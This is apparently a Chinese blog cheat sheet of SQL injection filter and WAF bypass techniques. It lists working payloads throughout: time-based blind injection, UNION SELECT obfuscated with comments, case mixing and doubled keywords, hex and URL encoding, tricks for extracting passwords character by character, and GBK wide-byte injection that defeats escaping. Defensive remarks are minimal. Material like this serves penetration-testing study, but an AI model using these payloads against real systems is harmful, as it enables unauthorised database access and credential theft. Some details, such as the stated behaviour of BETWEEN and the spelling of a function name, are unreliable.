sql注入常见注释及绕过

一、绕过空格(注释符/* */,%a0)

1.两个空格代替一个空格(双写)

2.%a0=空格

3.最基本的绕过方法,用注释替换空格:/*注释/*

4.括号绕过空格

  如果空格被过滤,括号没有被过滤,可以用括号绕过。

  在MySQL中,括号是用来包围子查询的。因此,任何可以计算出结果的语句,都可以用括号包围起来。而括号的两端,可以没有多余的空格。

例如:time based盲注:

?id=1%27and(sleep(ascii(mid(database()from(1)for(1)))=109))%23

  上面的方法既没有逗号也没有空格。猜解database()第一个字符ascii码是否为109,若是则加载延时。

二、引号绕过(使用十六进制)

  会使用到引号的地方一般是在最后的where子句中。这个时候如果引号被过滤了,那么where子句就无法使用了。那么遇到这样的问题就要使用十六进制来处理这个问题了。

几乎没有任何注入能过滤十六进制。

三、逗号绕过(使用from或者offset)

在使用盲注的时候,需要使用到substr(),mid(),limit。这些子句方法都需要使用到逗号。

例如:

使用from to:

select substr(database() from 1 for 1);
select mid(database() from 1 for 1);

  使用join:

union select 1,2
union select * from (select 1)a join (select 2)b

  使用like:

select ascii(mid(user(),1,1))=80 #等价于
select user() like 'r%'

  使用offset来绕过limit中的",":

select * from news limit 0,1
select * from news limit 1 offset 0

四、比较符号(<>)绕过(过滤了<>:sqlmap盲注经常使用<>,使用between的脚本)

盲注的时候如果无法使用比较操作符,可使用greatest()least()。(前者返回最大值,后者返回最小值)

select * from users where id=1 and ascii(substr(database(),0,1))>64
select * from users where id=1 and greatest(ascii(substr(database(),0,1)),64)=64

使用between and:

between a and b:返回a,b之间的数据,不包含b。

五、or and xor not绕过

and=&&or=||xor=| not=!

六、绕过注释符号(#,--(后面跟一个空格))过滤

id=1' union select 1,2,3||'1

  最后的or '1闭合查询语句的最后的单引号,或者:

id=1' union select 1,2,'3

七、= 绕过

  使用like 、rlike 、regexp(正则表达式) 或者 使用< 或者 >

八、绕过union,select,where等

1.使用注释符绕过:

  常用注释符:

//-- , /**/, #, --+, -- -, ; , %00 , --a

  用法:

U/**/ NION /**/ SE/**/ LECT /**/user,pwd from user

2.使用大小写绕过:

id=-1'UnIoN/**/SeLeCT

3.内联注释绕过:

id=-1'/*!UnIoN*/ SeLeCT 1,2,concat(/*!table_name*/) FrOM /*information_schema*/.tables /*!WHERE *//*!TaBlE_ScHeMa*/ like database()#

4. 双关键字绕过(若删除掉第一个匹配的union就能绕过):

id=-1'UNIunionONSeLselectECT1,2,3--

5.使用URLencode,ascii编码,

%53%45%4c%45%43%54(ascii)

6.函数或特殊符号

例如:表示admin,oracle中可以用 'adm'||'in' , mysql中可以用 concat('adm','in'); mssql中可以用:'adm'+'in'

九、通用绕过(编码)

  如URLEncode编码,ASCII,HEX,unicode编码绕过:

如:urlencode: or 1=1即%6f%72%20%31%3d%31

ASCII : Test可以为CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)

十、等价函数绕过(不同数据库)

hex()、bin() ==> ascii()
sleep() ==>benchmark()
concat_ws()==>group_concat()
mid()、substr() ==> substring()
@@user ==> user()
@@datadir ==> datadir()

例如:substring()和substr()无法使用时:

?id=1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=74

或者:

substr((select 'password'),1,1) = 0x70
strcmp(left('password',1), 0x69) = 1
strcmp(left('password',1), 0x70) = 0
strcmp(left('password',1), 0x71) = -1

十二.宽字节注入

过滤'的时候往往利用的思路是将 ' 转换为 \' 。

在 mysql 中使用 GBK 编码的时候,会认为两个字符为一个汉字,一般有两种思路:

  (1)%df 吃掉 \ 具体的方法是 urlencode('\) = %5c%27,我们在 %5c%27 前面添加 %df ,形成 %df%5c%27 ,而 mysql 在 GBK 编码方式的时候会将两个字节当做一个汉字,%df%5c 就是一个汉字,%27 作为一个单独的(')符号在外面:

id=-1%df%27union select 1,user(),3--+

  (2)将 \' 中的 \ 过滤掉,例如可以构造 %**%5c%5c%27 ,后面的 %5c 会被前面的 %5c 注释掉。

一般产生宽字节注入的PHP函数:

1.replace():过滤 ' \ ,将 ' 转化为 \' ,将 \ 转为 \\,将 " 转为 \" 。用思路一。

2.addslaches():返回在预定义字符之前添加反斜杠(\)的字符串。预定义字符:' , " , \ 。用思路一

(防御此漏洞,要将 mysql_query 设置为 binary 的方式)

   3.mysql_real_escape_string():转义下列字符:

\x00 \n \r \ ' " \x1a

(防御,将mysql设置为gbk即可)

最后修改:2020 年 08 月 10 日 08 : 44 PM
© 允许规范转载
请作者喝杯奶茶吧~